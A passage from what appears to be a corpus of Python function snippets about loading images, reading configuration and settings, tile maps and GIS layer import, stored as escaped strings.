print(\"[+] UPDATE - Images loaded\")", "def restore_settings(self, plugin_settings, instance_settings):\n path = None\n try:\n path = instance_settings.value(\"output_directory\")\n except:\n pass\n self._set_output_directory(path)\n\n labels = None\n try:\n labels = instance_settings.value(\"labels\")\n except:\n pass\n #labels = self._read_labels()\n #self._set_labels(labels)\n self._create_service_client(str(instance_settings.value(\"service_name\", \"/image_recognition/my_service\")))\n self._create_subscriber(str(instance_settings.value(\"topic_name\", \"/xtion/rgb/image_raw\")))", "def import_images(site):\n image_bank = site['imagens']\n # look inside \"images\" folder and import all files\n path = os.path.dirname(os.path.abspath(__file__)) + '/browser/images/'\n logger.info(u'Importando imagens')\n for name in os.listdir(path):\n with open(path + name) as f:\n image = StringIO(f.read())\n img_name = name.split('.')[0]\n title = img_name.replace('-', ' ').title()\n api.content.create(\n image_bank,\n type = 'Image',\n id = name,\n title = title,\n description = u'Esta imagem é referenciada nos conteúdos do portal.',\n image = image,\n creators = CREATORS,\n )\n logger.debug(u' {0} importada'.format(name))", "def fill_import_section():\n section = _SectionData(\"Import\")\n section.props.append((\"ImportScale\", _property_utils.get_by_type(bpy.types.GlobalSCSProps.import_scale)))\n section.props.append((\"PreservePathForExport\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_preserve_path_for_export))))\n section.props.append((\"ImportPimFile\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_pim_file))))\n section.props.append((\"UseWelding\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_use_welding))))\n section.props.append((\"WeldingPrecision\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_welding_precision))))\n section.props.append((\"UseNormals\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_use_normals))))\n section.props.append((\"ImportPitFile\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_pit_file))))\n section.props.append((\"LoadTextures\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_load_textures))))\n section.props.append((\"ImportPicFile\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_pic_file))))\n section.props.append((\"ImportPipFile\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_pip_file))))\n section.props.append((\"ImportPisFile\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_pis_file))))\n section.props.append((\"ConnectedBones\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_connected_bones))))\n section.props.append((\"BoneImportScale\", _property_utils.get_by_type(bpy.types.GlobalSCSProps.import_bone_scale)))\n section.props.append((\"ImportPiaFile\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_pia_file))))\n section.props.append((\"IncludeSubdirsForPia\", int(_property_utils.get_by_type(bpy.types.GlobalSCSProps.import_include_subdirs_for_pia))))\n return section", "def settings(args):\n data = {}\n data['train_x'] = load_pkl(os.path.join(args.data_dir, 'train_images.pkl'))\n data['train_y'] = load_pkl(os.path.join(args.data_dir, 'train_labels.pkl'))\n data['valid_x'] = load_pkl(os.path.join(args.data_dir, 'valid_images.pkl'))\n data['valid_y'] = load_pkl(os.path.join(args.data_dir, 'valid_labels.pkl'))\n if args.combine_train_val:\n data['train_x'].update(data['valid_x'])\n data['train_y'].update(data['valid_y'])\n data['valid_x'] = load_pkl(os.path.join(args.data_dir, 'test_images.pkl'))\n data['valid_y'] = load_pkl(os.path.join(args.data_dir, './data/bsd_pkl_float/test_labels.pkl'))\n args.display_step = len(data['train_x']) / 46\n # Default configuration\n if args.default_settings:\n args.n_epochs = 250\n args.batch_size = 10\n args.learning_rate = 3e-2\n args.std_mult = 0.8\n args.delay = 8\n args.filter_gain = 2\n args.filter_size = 5\n args.n_rings = 4\n args.n_filters = 7\n args.save_step = 5\n args.height = 321\n args.width = 481\n\n args.n_channels = 3\n args.lr_div = 10.\n args.augment = True\n args.sparsity = True\n\n args.test_path = args.save_name\n args.log_path = './logs'\n args.checkpoint_path = './checkpoints'\n\n make_dirs(args, args.test_path)\n make_dirs(args, args.log_path)\n make_dirs(args, args.checkpoint_path)\n\n return args, data", "def __load(self, node, path):\n\n self.firstgid = node['firstgid']\n self.margin = node['margin']\n self.spacing = node['spacing']\n\n # convierte la ruta de la imagen en una ruta relativa al proyecto\n directory = os.path.dirname(path)\n self.image_path = os.path.join(directory, *node['image'].split(r'\\/'))\n self.image_path = os.path.normpath(self.image_path)", "def parse_config():\n config_path = Path(\"config.ini\")\n if config_path.exists():\n config.read(config_path)\n else:\n config[\"database\"] = {\"location\": \"image-database.db\"}\n config[\"images\"] = {\"extensions\": \".jpeg,.jpg,.png,.gif,.tiff\"}\n with open(config_path, \"w\") as configfile:\n config.write(configfile)\n config.read(config_path)", "def ConfigureCustomImageSettings(cam_params, nodemap):\r\n\tprint('\\n*** CONFIGURING CUSTOM IMAGE SETTINGS *** \\n')\r\n\ttry:\r\n\t\tresult = True\r\n\t\twidth_to_set = cam_params[\"frameWidth\"]\r\n\t\theight_to_set = cam_params[\"frameHeight\"]\r\n\r\n\t\t# Set maximum width\r\n\t\t#\r\n\t\t# *** NOTES ***\r\n\t\t# Other nodes, such as those corresponding to image width and height,\r\n\t\t# might have an increment other than 1. In these cases, it can be\r\n\t\t# important to check that the desired value is a multiple of the\r\n\t\t# increment. However, as these values are being set to the maximum,\r\n\t\t# there is no reason to check against the increment.\r\n\t\tnode_width = PySpin.CIntegerPtr(nodemap.GetNode('Width'))\r\n\t\tif PySpin.IsAvailable(node_width) and PySpin.IsWritable(node_width):\r\n\t\t\t# width_to_set = node_width.GetMax()\r\n\t\t\twidth_to_set = cam_params[\"frameWidth\"]\r\n\t\t\tnode_width.SetValue(width_to_set)\r\n\t\t\tprint('Width set to %i...' % node_width.GetValue())\r\n\t\telse:\r\n\t\t\t print('Width not available...')\r\n\r\n\t\t# Set maximum height\r\n\t\t# *** NOTES ***\r\n\t\t# A maximum is retrieved with the method GetMax(). A node's minimum and\r\n\t\t# maximum should always be a multiple of its increment.\r\n\t\tnode_height = PySpin.CIntegerPtr(nodemap.GetNode('Height'))\r\n\t\tif PySpin.IsAvailable(node_height) and PySpin.IsWritable(node_height):\r\n\t\t\t# height_to_set = node_height.GetMax()\r\n\t\t\theight_to_set = cam_params[\"frameHeight\"]\r\n\t\t\tnode_height.SetValue(height_to_set)\r\n\t\t\tprint('Height set to %i...' % node_height.GetValue())\r\n\t\telse:\r\n\t\t\tprint('Height not available...')\r\n\r\n\texcept PySpin.SpinnakerException as ex:\r\n\t\tprint('Error: %s' % ex)\r\n\t\treturn False\r\n\r\n\treturn result, width_to_set, height_to_set", "def load(self):\n logger.debug(f\"Reading {self.path.name}\")\n self.label = int(Data.fromLabel(self.path.parent.name))\n self.image = skimg.data.imread(self.path)", "def load_image(filename, color=True):\n img = skimage.img_as_float(skimage.io.imread(filename, as_grey=not color)).astype(np.float32)\n if img.ndim == 2:\n img = img[:, :, np.newaxis]\n if color:\n img = np.tile(img, (1, 1, 3))\n elif img.shape[2] == 4:\n img = img[:, :, :3]\n return img", "def update_image(self):\n if self.filenames:\n pos = self.slider.value()\n proj, flat, dark, theta = dx.read_aps_32id(self.filenames, proj=(pos, pos+1))\n if self.ffc_correction:\n image = proj[0,:,:].astype(np.float)/flat[0,:,:].astype(np.float)\n else:\n image = proj[0,:,:].astype(np.float)\n self.image_item.setImage(image)", "def _load_image(self, index: int) -> Tensor:\n path = self.files[index][\"image\"]\n with rasterio.open(path) as f:\n array = f.read()\n tensor = torch.from_numpy(array).float()\n return tensor", "def _load_image_set_index(self, anno_filepath):\n # Check\n assert os.path.exists(anno_filepath), \\\n 'Path does not exist: {}'.format(anno_filepath)\n # Open and read\n with open(anno_filepath) as f:\n # format: imgidx x1 y1 x2 y2 label_list\n # whre label list look like this: 0 0 0 0 1 0 0 (assume here has six action classes)\n image_index = [x.strip().split()[0] for x in f.readlines()]\n # \n return image_index", "async def cmd_galloadsettings(self, ctx):\n config = Config()\n\n # ===== UPDATE THE SETTINGS IN THE LOCAL COG\n self.cogset['guild_id'] = config.target_guild_id\n self.cogset['enable']= config.galEnable\n self.cogset['channel_ids'] = config.gallerys[\"chls\"]\n self.cogset['text_expirein']= config.gallerys['expire_in']\n self.cogset['rem_low']= config.gallerys['rem_low']\n self.cogset['user_wl']= config.gallerys[\"user_wl\"]\n self.cogset['allow_links']= config.gallerys[\"links\"]\n self.cogset['link_wl']= config.gallerys['link_wl']\n\n # ===== SAVE COG SETTING\n await cogset.SAVE(self.cogset, cogname=self.qualified_name)\n \n # ===== RETURN\n await ctx.channel.send(content=\"Gallery information has been updated from the setup.ini file\", delete_after=15)\n return", "def settings(self):\n return dict(img_size=self.img_size, interpolation=self.interpolation)", "def loadImagesTag(self): \n dictionary = {}\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(GENDER_FRONT)\n dictionary[\"gender\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SKIN_BACK)\n dictionary[\"skin\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(HEAD_BACK)\n dictionary[\"head\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(BODY_BACK)\n dictionary[\"body\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(MASK_BACK)\n dictionary[\"mask\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(HAIR_BACK)\n dictionary[\"hair\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n if self.avatarConfiguration[\"gender\"] == \"boy\":\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SHIRT_BACK)\n dictionary[\"shirt\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(TROUSERS_BACK)\n dictionary[\"trousers\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SKIRT_BACK)\n dictionary[\"skirt\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n else:\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SHIRT_DISABLED)\n dictionary[\"shirt\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(TROUSERS_DISABLED)\n dictionary[\"trousers\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SKIRT_BACK)\n dictionary[\"skirt\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(SHOES_BACK)\n dictionary[\"shoes\"] = guiobjects.OcempImageButtonTransparent(imgPath)\n return dictionary", "def load_tile(path, tile_size):\n img = pyglet.resource.image(path)\n img.width = tile_size\n img.height = tile_size\n return img", "def test_load_jpg():\n parameters = {'path': 'green-dot.jpg'}\n\n images.load(parameters)", "def set_imagefile(self,imagefile):\n self.imagefile = imagefile", "def _load_image_set_index(self):\n image_index = self._load_annotations().keys()\n return image_index", "def import_file(self, *args, **kwargs):\n filename = self.file\n self.completed_layers = []\n err = GdalErrorHandler()\n gdal.PushErrorHandler(err.handler)\n gdal.UseExceptions()\n configuration_options = kwargs.get('configuration_options', [{'index': 0}])\n\n # Configuration options should be a list at this point since the importer can process multiple layers in a\n # single import\n if isinstance(configuration_options, dict):\n configuration_options = [configuration_options]\n\n data, inspector = self.open_source_datastore(filename, *args, **kwargs)\n\n datastore_layers = inspector.describe_fields()\n\n if len(datastore_layers) == 0:\n logger.debug('No Dataset found')\n\n layers_info = []\n\n # Add index for any layers configured by name\n for layer_configuration in configuration_options:\n if 'layer_name' in layer_configuration:\n lookup = 'layer_name'\n elif 'index' in layer_configuration:\n lookup = 'index'\n else:\n lookup = None\n logger.debug('could not find lookup')\n continue\n\n for datastore_layer in datastore_layers:\n if datastore_layer.get(lookup) == layer_configuration.get(lookup):\n layer_configuration.update(datastore_layer)\n layers_info.append(layer_configuration)\n\n for layer_options in layers_info:\n if layer_options['raster']:\n \"\"\"\n File is a raster, we need to convert into optimized GeoTiff\n and skip any further testing or loading into target_store\n \"\"\"\n # Increment filename to make sure target doesn't exists\n filedir, filebase = os.path.split(filename)\n outfile = '%s.tif' % os.path.splitext(filebase)[0]\n fileout = increment_filename(os.path.join(RASTER_FILES, outfile))\n raster_import(layer_options['path'], fileout)\n self.completed_layers.append([fileout, layer_options])\n else:\n target_file, _ = self.open_target_datastore(self.target_store)\n target_create_options = []\n\n # Prevent numeric field overflow for shapefiles https://trac.osgeo.org/gdal/ticket/5241\n if target_file.GetDriver().GetName() == 'PostgreSQL':\n target_create_options.append('PRECISION=NO')\n\n layer_options['modified_fields'] = {}\n layer = data.GetLayer(layer_options.get('index'))\n layer_name = layer_options.get('name', layer.GetName().lower())\n layer_type = self.get_layer_type(layer, data)\n srs = layer.GetSpatialRef()\n\n if layer_name.lower() == 'ogrgeojson':\n try:\n layer_name = os.path.splitext(os.path.basename(filename))[0].lower()\n except IndexError:\n pass\n\n layer_name = launder(str(layer_name))\n\n # default the layer to 4326 if a spatial reference is not provided\n if not srs:\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(4326)\n\n # pass the srs authority code to handlers\n if srs.AutoIdentifyEPSG() == 0:\n layer_options['srs'] = '{0}:{1}'.format(srs.GetAuthorityName(None), srs.GetAuthorityCode(None))\n\n n = 0\n while True:\n n += 1\n try:\n target_layer = self.create_target_dataset(target_file, layer_name, srs, layer_type,\n options=target_create_options)\n except RuntimeError as e:\n # logger.exception('exception in creating target dataset')\n # the layer already exists in the target store, increment the name\n if 'Use the layer creation option OVERWRITE=YES to replace it.' in e.message:\n layer_name = increment(layer_name)\n\n # try 100 times to increment then break\n if n >= 100:\n break\n\n continue\n else:\n raise e\n break\n\n # adding fields to new layer\n layer_definition = ogr.Feature(layer.GetLayerDefn())\n source_fid = None\n\n wkb_field = 0\n\n for i in range(layer_definition.GetFieldCount()):\n\n field_def = layer_definition.GetFieldDefnRef(i)\n\n if field_def.GetName() == target_layer.GetFIDColumn() and field_def.GetType() != 0:\n field_def.SetType(0)\n\n if field_def.GetName() != 'wkb_geometry':\n target_layer.CreateField(field_def)\n new_name = target_layer.GetLayerDefn().GetFieldDefn(i - wkb_field).GetName()\n old_name = field_def.GetName()\n\n if new_name != old_name:\n layer_options['modified_fields'][old_name] = new_name\n\n if old_name == target_layer.GetFIDColumn() and not layer.GetFIDColumn():\n source_fid = i\n else:\n wkb_field = 1\n\n if wkb_field is not 0:\n layer.SetIgnoredFields(['wkb_geometry'])\n\n for i in range(0, layer.GetFeatureCount()):\n feature = layer.GetFeature(i)\n\n if feature and feature.geometry():\n\n if not layer.GetFIDColumn():\n feature.SetFID(-1)\n\n if feature.geometry().GetGeometryType() != target_layer.GetGeomType() and \\\n target_layer.GetGeomType() in range(4, 7):\n\n conversion_function = ogr.ForceToMultiPolygon\n\n if target_layer.GetGeomType() == 5:\n conversion_function = ogr.ForceToMultiLineString\n\n elif target_layer.GetGeomType() == 4:\n conversion_function = ogr.ForceToMultiPoint\n\n geom = ogr.CreateGeometryFromWkb(feature.geometry().ExportToWkb())\n feature.SetGeometry(conversion_function(geom))\n\n if source_fid is not None:\n feature.SetFID(feature.GetField(source_fid))\n\n try:\n target_layer.CreateFeature(feature)\n\n except:\n for field in range(0, feature.GetFieldCount()):\n if feature.GetFieldType(field) == ogr.OFTString:\n try:\n feature.GetField(field).decode('utf8')\n except UnicodeDecodeError:\n feature.SetField(field, decode(feature.GetField(field)))\n except AttributeError:\n continue\n try:\n target_layer.CreateFeature(feature)\n except err as e:\n logger.error('Create feature failed: {0}'.format(gdal.GetLastErrorMsg()))\n raise e\n\n self.completed_layers.append([target_layer.GetName(), layer_options])\n\n return self.completed_layers", "def image_process(image_info):\n path = os.path.join(cfg.IMAGESET, image_info.get(\"index\") + \".jpg\")\n if not os.path.exists(path):\n raise IOError(\"please check your file is not exists: \" + path)\n def load_image(path):\n image = Image.open(path)\n return image\n return load_image(path)", "def import_image(filepath):\n \n im_path = os.path.join(str(filepath))\n im_files = glob.glob(im_path)\n im_col = []\n \n for imc in im_files:\n #imc = plt.imread(img, 0) # changed from cv2.imread\n img = cv2.imread(imc, cv2.COLOR_BGR2GRAY)\n imcg = np.array(img)\n try:\n xy = np.shape(imcg) #added\n except:\n continue\n imgr = imcg.reshape((xy[0]*xy[1],)) #added\n imgr = np.array(imgr)\n im_col.append(imgr.transpose())\n \n return(im_col)", "def import_media(self, path):\n media_vertex = {}\n infile = configparser.ConfigParser()\n infile.read(path, encoding='utf-8')\n # Use the path name for error messages or assignments\n for field in infile.items(\"media\"):\n if (field[0].find(\"photo\") != -1 and\n len(field[0].split(\".\")) == 2):\n # Process a small set of photo credits for all the pandas\n # author = infile.get(\"media\", field[0] + \".author\")\n # if author in self.photo[\"credit\"].keys():\n # self.photo[\"credit\"][author] = self.photo[\"credit\"][author] + 1\n # else:\n # self.photo[\"credit\"][author] = 1\n # Track what the max number of panda photos an object has is\n # test_count = int(field[0].split(\".\")[1])\n # if test_count > self.photo[\"max\"]:\n # self.photo[\"max\"] = test_count\n # Accept the data and continue\n media_vertex[field[0]] = field[1]\n # TODO: track video info for apple counting as well\n else:\n # Accept the data and move along\n media_vertex[field[0]] = field[1]\n self.media.append(media_vertex)\n self.vertices.append(media_vertex)\n self.media_files.append(path)", "def _load_image_set_index(self):\n image_set_file = os.path.join(self._data_path, 'ImageSets', 'Main',\n self._image_set + '.txt')\n assert os.path.exists(image_set_file), \\\n 'Path does not exist: {}'.format(image_set_file)\n with open(image_set_file) as f:\n image_index = [x.strip() for x in f.readlines()]\n return image_index", "def import_images(folder_path, alphabet_list):\n reference_images = {}\n for i in alphabet_list[:-1] + ['space']:\n img = np.array(Image.open(folder_path + f'/{i}.png')).astype('int')\n reference_images[i] = img\n reference_images[' '] = reference_images.pop('space')\n return reference_images", "def load_background(self, image):\n self.bg = pygame.image.load(image).convert()", "def getFile(self):\r\n self.file_name=QtGui.QFileDialog.getOpenFileName(self, \"Open Image file\", self.path, \"*tif\")\r\n if self.file_name!='':\r\n \r\n self.img= skimage.io.imread(str(self.file_name), plugin='tifffile')\r\n \"\"\"sets self.img equal to the chosen image\"\"\"\r\n \r\n self.temp= interp_img(np.zeros(self.img.shape), self.zinterp)\r\n self.edge= interp_img(np.zeros(self.img.shape), self.zinterp)\r\n self.shrink= np.zeros(self.img.shape)\r\n self.count=0\r\n \r\n self.z_stack=self.img.shape[0]/2\r\n self.y_stack=self.img.shape[1]/2\r\n self.x_stack=self.img.shape[2]/2\r\n \r\n self.dispedge = to_rgb(self.img[self.z_stack])\r\n self.y_dispedge= to_rgb(self.img[:,self.y_stack,:])\r\n self.x_dispedge= to_rgb(self.img[:,:,self.x_stack])\r\n #self.pixmap=QtGui.QPixmap.fromImage(ImageQt.ImageQt(misc.toimage(self.img[self.z_stack]))).scaled(500,500)\r\n \r\n self.resetImages()", "def load_image(self, image_id):\n info = self.image_info[image_id]\n # bg_color = np.array(info['bg_color']).reshape([1, 1, 3])\n # image = np.ones([info['height'], info['width'], 3], dtype=np.uint8)\n # image = image * bg_color.astype(np.uint8)\n # for shape, color, dims in info['shapes']:\n # image = self.draw_shape(image, shape, dims, color)\n\n width, height = info['width'], info['height']\n\n if info['real']:\n # load image from disk\n impath = os.path.join(self.real_image_dirpath, info['real_image_path'])\n image = cv2.imread(impath,1)\n image = cv2.resize(image, (width, height), cv2.INTER_CUBIC)\n else:\n # synthesize image\n background_path = info['background_image_path']\n card_template_path = info['card_template_path']\n cornerpoints = info['cornerpoints']\n image = self.synthesize_image(card_template_path, background_path, cornerpoints, (width, height))\n return image", "def __init__(self, image_size, heatmap_size):\n super(ProjectLayer, self).__init__()\n self.image_size = image_size\n self.heatmap_size = heatmap_size\n if isinstance(self.image_size, int):\n self.image_size = [self.image_size, self.image_size]\n if isinstance(self.heatmap_size, int):\n self.heatmap_size = [self.heatmap_size, self.heatmap_size]", "def initImg(self):\n self.img = Image.new('RGBA',(self.width,self.height),color='#' + getConfigPart(self.theme,\"bg\"))\n self.draw = ImageDraw.Draw(self.img)", "def setup():\n img = Image.new('RGB', (10, 20))\n img.putpixel((5, 10), (0, 255, 0))\n img.save('green-dot.tif')\n img.save('green-dot.jpg')\n img.save('green-dot.png')", "def load(self, image_loader):\n self._image_loader = image_loader\n for tile_set in self.tile_sets:\n # do images first, because tiles could reference it\n for img in tile_set.images:\n if img.source:\n self._load_image_from_source(tile_set, img)\n else:\n tile_set.indexed_images[img.id] = self._load_image(img)\n # tiles\n for tile in tile_set.tiles:\n for img in tile.images:\n if not img.content and not img.source:\n # only image id set\n indexed_img = tile_set.indexed_images[img.id]\n self.indexed_tiles[int(tile_set.firstgid) + int(tile.id)] = (0, 0, indexed_img)\n else:\n if img.source:\n self._load_image_from_source(tile_set, img)\n else:\n indexed_img = self._load_image(img)\n self.indexed_tiles[int(tile_set.firstgid) + int(tile.id)] = (0, 0, indexed_img)", "def load(self, image_loader):\n self._image_loader = image_loader\n for tile_set in self.tile_sets:\n # do images first, because tiles could reference it\n for img in tile_set.images:\n if img.source:\n self._load_image_from_source(tile_set, img)\n else:\n tile_set.indexed_images[img.id] = self._load_image(img)\n # tiles\n for tile in tile_set.tiles:\n for img in tile.images:\n if not img.content and not img.source:\n # only image id set\n indexed_img = tile_set.indexed_images[img.id]\n self.indexed_tiles[int(tile_set.firstgid) + int(tile.id)] = (0, 0, indexed_img)\n else:\n if img.source:\n self._load_image_from_source(tile_set, img)\n else:\n indexed_img = self._load_image(img)\n self.indexed_tiles[int(tile_set.firstgid) + int(tile.id)] = (0, 0, indexed_img)", "def __init__(self, opt):\r\n super().__init__(opt)\r\n\r\n self.image_color = []\r\n for folder in self.annotations.keys():\r\n for image in self.annotations[folder].keys():\r\n img_path = os.path.join(self.root_dir, folder, image)\r\n camera, spec, n = image.split('_')\r\n if camera == 'BB':\r\n continue\r\n else:\r\n if spec == 'color':\r\n self.image_color.append(img_path)\r\n\r\n def sort_priority(x):\r\n *_, folder, name = x.split('/')\r\n folder_n = int(folder[1])\r\n folder_t = folder[2]\r\n name = int(name[0:-4].split('_')[-1])\r\n return folder_n, folder_t, name\r\n\r\n self.image_source, self.image_target = self._get_src_tgt(\r\n opt.augmentation_ratio, self.image_color, sort_priority)", "def open_image(self):\n self.orig_image = Image.open(self.filename)\n if self.in_rgb:\n self.orig_image = self.orig_image.convert(\"RGB\")\n if self.min_filter:\n self.orig_image.filter(ImageFilter.MinFilter(self.min_filter))", "def _load_image_set_index(self):\n image_index = []\n image_set_file = self.data_dir \\\n + \"/ImageSets/{}.txt\".format(self.mode)\n\n assert os.path.exists(image_set_file), \\\n 'Path does not exist: {}'.format(image_set_file)\n with open(image_set_file, 'r') as f:\n for line in f.readlines():\n image_index.append(line.strip())\n return image_index", "def import_photos(site):\n image_bank = site['institucional']['fotos']\n image_names = ['plenario-camara.jpg', 'plenario-senado.jpg', 'congresso-nacional.jpg']\n # look inside \"static\" folder and import some files\n path = os.path.dirname(os.path.abspath(__file__)) + '/browser/static/'\n logger.info(u'Importando imagens')\n for name in image_names:\n with open(path + name) as f:\n image = StringIO(f.read())\n img_name = name.split('.')[0]\n title = img_name.replace('-', ' ').title()\n api.content.create(\n image_bank,\n type = 'Image',\n id = name,\n title = title,\n description = u'Foto de demonstração no tamanho 3x2. (esta imagem é um conteúdo de exemplo e pode ser removida)',\n image = image,\n creators = CREATORS,\n )\n logger.debug(u' {0} importada'.format(name))", "def test_grdimage_file():\n fig = Figure()\n fig.grdimage(\n \"@earth_relief_01d_g\",\n cmap=\"ocean\",\n region=[-180, 180, -70, 70],\n projection=\"W0/10i\",\n shading=True,\n )\n return fig", "def _set_attr(self):\n self.as_skeletal = self._import_as_skeleton()\n self.materials = self._import_materials()\n self.textures = self._import_textures()", "def get_image(self):\n if self._image is None:\n image_data = np.load(self.image_file)\n if not isinstance(image_data, np.ndarray):\n image_data = image_data['arr_0']\n self.meta_data = ImageWrapper.load_metadata(self.image_file+\".meta\")\n exposure_time = self.meta_data['exposure_time_us'] * 1e-6\n dark_level = float(self.meta_data['black_level'])\n # saturation_mask = image_data.max(axis=2) >= 4094\n image_data = np.clip((image_data.astype(np.float32) - dark_level),\n a_min=0.0, a_max=None) / exposure_time\n if self.original_vignetting is not None:\n image_data = image_data / self.original_vignetting\n if self.crop is not None:\n image_data = image_data[\n self.crop[1,0]:self.crop[1,1],\n self.crop[0,0]:self.crop[0,1]\n ]\n # saturation_mask = saturation_mask[\n # self.crop[1,0]:self.crop[1,1],\n # self.crop[0,0]:self.crop[0,1]\n # ]\n if self.down_sample is not None:\n image_data = cv2.resize(\n image_data,\n dsize=None,\n fx=1./self.down_sample,\n fy=1./self.down_sample,\n interpolation=cv2.INTER_AREA\n )\n # saturation_mask = cv2.resize(\n # saturation_mask,\n # dsize=None,\n # fx=1./self.down_sample,\n # fy=1./self.down_sample,\n # interpolation=cv2.INTER_AREA\n # )\n if self.reup_sample is not None:\n image_data = cv2.resize(\n image_data,\n dsize=None,\n fx=self.reup_sample,\n fy=self.reup_sample,\n interpolation=cv2.INTER_CUBIC\n )\n # saturation_mask = cv2.resize(\n # saturation_mask,\n # dsize=None,\n # fx=self.reup_sample,\n # fy=self.reup_sample,\n # interpolation=cv2.INTER_CUBIC\n # )\n image = torch.tensor(np.transpose(image_data, (2,0,1)), dtype=torch.float32, device=self.device)\n # saturation_mask = torch.tensor(saturation_mask, dtype=torch.float32, device=self.device)\n if not self.lazy:\n self._image = image\n # self._saturation_mask = saturation_mask\n else:\n image = self._image\n # saturation_mask = self._saturation_mask\n\n return image#, saturation_mask", "def load_images(self):\n for image in self.gltf.images:\n self.images.append(image.load(self.path.parent))", "def create_preset_images(self):\n for f in sorted(self.get_files_from_data()):\n photoInstances = {}\n for preset in self.generator.settings[\"GALLERY_PRESETS\"]:\n preset_dir = \"%s%s%s\" % (self.absolute_output_path,\n os.sep, \n preset[\"name\"])\n photoInstances[preset[\"name\"]] = Photo(self, f, preset_dir, preset)\n \n self.photos.append(photoInstances)", "def import_L1B(cls,infile):\r\n try:\r\n import gdal\r\n import rasterio\r\n except:\r\n raise ImportError(\"Can not import module GDAL or RasterIO\")\r\n\r\n\r\n image=image()\r\n\r\n #except:\r\n # raise ImportError(\"Can not read band\")\r", "def import_graphics_section(self, filename_suffix='gra'):\n pass", "def load(cls):\n\n cls.images[\"Wall\"] = pygame.image.load(\n \"ressources/images/wall.png\").convert()\n cls.images[\"MacGyver\"] = pygame.image.load(\n \"ressources/images/Mac.png\").convert()\n cls.images[\"Guardian\"] = pygame.image.load(\n \"ressources/images/Guardian.png\").convert()\n cls.images[\"Path\"] = pygame.image.load(\n \"ressources/images/path.png\").convert()\n cls.images[\"Tube\"] = pygame.image.load(\n \"ressources/images/tube.png\").convert()\n cls.images[\"Ether\"] = pygame.image.load(\n \"ressources/images/ether.png\").convert()\n cls.images[\"Needle\"] = pygame.image.load(\n \"ressources/images/needle.png\").convert()\n cls.images[\"gr\"] = pygame.image.load(\n \"ressources/images/but_du_jeu.png\").convert()", "def load_base_images(base_img):\n if base_img is not None:\n if not os.path.exists(base_img):\n base_img = os.path.join(LIGHTHOUSES_DIR, base_img)\n return (\n Image.open(os.path.join(base_img, 'on.gif')).convert('RGBA'),\n Image.open(os.path.join(base_img, 'off.gif'))\n )\n return None, None", "def load_image(self, name, colorkey=None):\n dictname = name[0:name.find('.')]\n fullname = os.path.join('TeddyLevel','data', name)\n try:\n image = pygame.image.load(fullname)\n except pygame.error, message:\n print 'Cannot load image:', fullname\n raise SystemExit, message\n image = image.convert()\n if colorkey is not None:\n if colorkey is -1:\n colorkey = image.get_at((0,0))\n image.set_colorkey(colorkey, RLEACCEL)\n self.dict[dictname] = image, image.get_rect()", "def load_image(self, image_name, piece_name):\n img = ImageTk.PhotoImage(Image.open(image_name))\n self.loaded_images[piece_name] = (img, image_name)\n return img", "def load(f, as_grey=False):\n use_plugin('pil')\n return imread(os.path.join(assets, f), as_grey=as_grey)", "def get_additional_images_downsample(widget) -> Dict[str, str]:\n images = {}\n for layer in widget.viewer.value.layers.selection:\n if layer._source.path is not None:\n images[layer._name] = str(layer._source.path)\n return images", "def imageItems(self, context):\n prefs = getPreferences()\n\n images = [('NONE', \"––– Select –––\", \"\")]\n if prefs.path_value:\n for img in environmentImages(prefs.path_value):\n images.append((img, img, \"\"))\n\n return images", "def load_image(self, image_id):\n # Load image\n image = skimage.io.imread(self.image_info[image_id]['path'])\n # If grayscale. Convert to RGB for consistency.\n if image.ndim != 3:\n image = skimage.color.gray2rgb(image)\n # If has an alpha channel, remove it for consistency\n if image.shape[-1] == 4:\n image = image[..., :3]\n return image", "def __init__(self):\n# This is the top container for all data. The gid is the global id (for a image).\n# Before calling convert most of the values are strings. Some additional\n# values are also calculated, see convert() for details. After calling\n# convert, most values are integers or floats where appropriat.\n # set through parser\n self.orientation = None\n self.tileheight = 0\n self.tilewidth = 0\n self.width = 0\n self.height = 0\n self.version = 0\n self.tile_sets = [] # TileSet\n self.layers = [] # WorldTileLayer <- what order? back to front (guessed)\n self.indexed_tiles = {} # {gid: (offsetx, offsety, image}\n self.object_groups = []\n self.properties = {} # {name: value}\n # additional info\n self.pixel_width = 0\n self.pixel_height = 0\n self.named_layers = {} # {name: layer}\n self.named_tile_sets = {} # {name: tile_set}\n self.map_file_name = \"\"\n self._image_loader = None", "def __init__(self):\n# This is the top container for all data. The gid is the global id (for a image).\n# 